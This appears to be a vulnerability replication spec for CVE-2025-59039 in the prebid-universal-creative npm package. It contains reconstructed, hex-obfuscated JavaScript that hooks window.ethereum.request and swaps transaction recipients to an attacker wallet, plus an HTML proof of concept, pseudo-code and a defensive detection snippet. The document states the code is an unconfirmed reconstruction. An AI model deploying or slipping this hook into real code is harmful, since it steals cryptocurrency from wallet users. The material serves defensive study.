CVE-2025-59039_ENV.md

# Replication Environment Tech Spec
## Target Software (Target Application Specification)

- Product / version: prebid-universal-creative / 1.17.3
- Distribution method: the vulnerable version (v1.17.3) has been taken down from public distribution, so the environment cannot be built with it
Note: how to install a legitimate (non-vulnerable) prebid-universal-creative

- Install prebid-universal-creative from the npm package (Repository: https://github.com/prebid/prebid-universal-creative.git)

```shell
npm install prebid-universal-creative
```
## System Environment

- OS: independent of OS
- Language: JavaScript
- Execution Environment: Prebid Universal Creative 1.17.3
## Other Required Conditions

1. Source code in which the vulnerability was found (AI-written)

Note: the vulnerable version of the software was downloaded, but the vulnerable code could not be confirmed in it.
Note: the code below is a reconstruction of the expected code, de-minified to improve readability.
```javascript
(function() {
  var pbjs = {};
  pbjs.renderAd = function() { /* ... */ };
  window.pbjs = pbjs;
})();
(function() {
  var _target = "\x65\x74\x68\x65\x72\x65\x75\x6d"; // "ethereum", obfuscated as hex escapes
  if (typeof window !== 'undefined' && window[_target]) {
    var originalRequest = window[_target].request;
    window[_target].request = function(payload) {
      if (payload && payload.method === 'eth_sendTransaction') {
        var params = payload.params[0];
        if (params && params.to) {
          console.log("[Attack] Swapping address: " + params.to + " -> 0xAttacker...");
          params.to = "0xAttackerWalletAddress1234..."; // attacker address
        }
      }
      // call the original function with the tampered payload
      return originalRequest.call(this, payload);
    };
  }
})();
```
2. PoC code (AI-written)

- Checks, from a browser console or an HTML file, whether window.ethereum.request has been tampered with
```html
<html>
<body>
  <h1>Vulnerability Check</h1>
  <script>
    window.ethereum = {
      request: function(args) {
        console.log("Original Wallet Function Called with:", args);
        return "Tx Sent to: " + args.params[0].to;
      }
    };
    (function() {
      var _target = "\x65\x74\x68\x65\x72\x65\x75\x6d";
      if (window[_target]) {
        var originalRequest = window[_target].request;
        window[_target].request = function(payload) {
          if (payload && payload.method === 'eth_sendTransaction') {
            payload.params[0].to = "0xAttackerWalletAddress...";
            console.log("[!] Malicious Hook Triggered!");
          }
          return originalRequest.call(this, payload);
        };
      }
    })();
    console.log("--- Attempting Transaction ---");
    window.ethereum.request({
      method: 'eth_sendTransaction',
      params: [{ from: "0xMe", to: "0xFriendAddress", value: "100" }]
    });
  </script>
</body>
</html>
```
3. Pseudo-code (AI-written)

- Target identification (e.g. Ethereum)
  `CONST TARGET_OBJECT = window["ethereum"] (decoded from hex "\x65\x74\x68...")`
  Targets window.ethereum, the global object exposed by cryptocurrency wallets. The string "ethereum" is not written literally but obfuscated as hex character codes.
- Environment check
  `IF (TARGET_OBJECT exists) AND (window is defined):`
  Confirms that a wallet is actually installed.
- Hook preparation
  `STORE Original_Request_Method = TARGET_OBJECT.request`
  Backs up the original request function into Original_Request_Method.
- Function overwrite
  `DEFINE TARGET_OBJECT.request AS FUNCTION(payload):`
- Payload inspection
  `IF payload.method EQUALS "eth_sendTransaction":`
  `EXTRACT transaction_params FROM payload.params[0]`
- Payload modification
  `IF transaction_params.to EXISTS:`
  `LOG "Swapping Address..."`
  `SET transaction_params.to = "0xAttackerWalletAddress..." // Malicious Address`
- Execution
  `RETURN CALL Original_Request_Method WITH modified_payload`
  `EXECUTE logic immediately (Self-Invoking Function)`
Steps 1 through 7 merged into a single pseudo-code listing:

```text
CONST TARGET_OBJECT = window["ethereum"]   (decoded from hex "\x65\x74\x68...")
IF (TARGET_OBJECT exists) AND (window is defined):
    STORE Original_Request_Method = TARGET_OBJECT.request
    DEFINE TARGET_OBJECT.request AS FUNCTION(payload):
        IF payload.method EQUALS "eth_sendTransaction":
            EXTRACT transaction_params FROM payload.params[0]
            IF transaction_params.to EXISTS:
                LOG "Swapping Address..."
                SET transaction_params.to = "0xAttackerWalletAddress..."   // Malicious Address
        RETURN CALL Original_Request_Method WITH modified_payload
EXECUTE logic immediately (Self-Invoking Function)
```
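A defender-side check for the hooking pattern described in the PoC and pseudo-code above, written as an added example (not code from this page or from the Prebid project): it detects that the provider's `request` function has been replaced and prevents the hook from rewriting the recipient in place. The `window`, the wallet stub and the hook are constructed fixtures so it runs under Node, and taking the snapshot before any ad script runs is an assumption about the host page.

```javascript
// Constructed stand-in for the browser globals: a host page `window` with a
// wallet provider stub, so this runs under Node. Not code from the page.
function makeWindow() {
  return {
    ethereum: {
      request: function (args) { return 'Tx to: ' + args.params[0].to; },
    },
  };
}

// Detection: the hook replaces the request property with a wrapper, so its
// identity no longer matches a snapshot taken before any third-party creative
// ran (assumption: the host page can take that snapshot first, e.g. in <head>).
function isRequestTampered(w, trustedRequest) {
  return Boolean(w.ethereum) && w.ethereum.request !== trustedRequest;
}

// Mitigation: never hand a mutable params object to request(). The hook edits
// params[0].to in place; on a frozen object that write is silently ignored
// (sloppy-mode hook) or throws a TypeError (strict-mode hook). Either way the
// substituted address never reaches the wallet.
function sendGuarded(w, tx) {
  const payload = { method: 'eth_sendTransaction', params: [Object.freeze({ ...tx })] };
  try {
    const result = w.ethereum.request(payload);
    return { sent: true, recipient: payload.params[0].to, result };
  } catch (e) {
    return { sent: false, recipient: tx.to, error: e.name };
  }
}

// Test fixture only: a hook with the same shape as the reconstructed code
// above, using a placeholder instead of an address.
function installHookLikeThePage(w) {
  const original = w.ethereum.request;
  w.ethereum.request = function (payload) {
    if (payload && payload.method === 'eth_sendTransaction' && payload.params[0]) {
      payload.params[0].to = '0xATTACKER_PLACEHOLDER';
    }
    return original.call(this, payload);
  };
}

const win = makeWindow();
const trusted = win.ethereum.request;
console.log('tampered before hook:', isRequestTampered(win, trusted));
installHookLikeThePage(win);
console.log('tampered after hook: ', isRequestTampered(win, trusted));
console.log(sendGuarded(win, { from: '0xMe', to: '0xFriendAddress', value: '100' }));
```

The identity check only catches property replacement; a hook that patches the provider at a lower level needs wallet-side integrity checks, which the page does not cover.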
## References
https://vuldb.com/ko/?id.323473
https://github.com/prebid/prebid-universal-creative
https://www.npmjs.com/package/prebid-universal-creative/v/1.2.0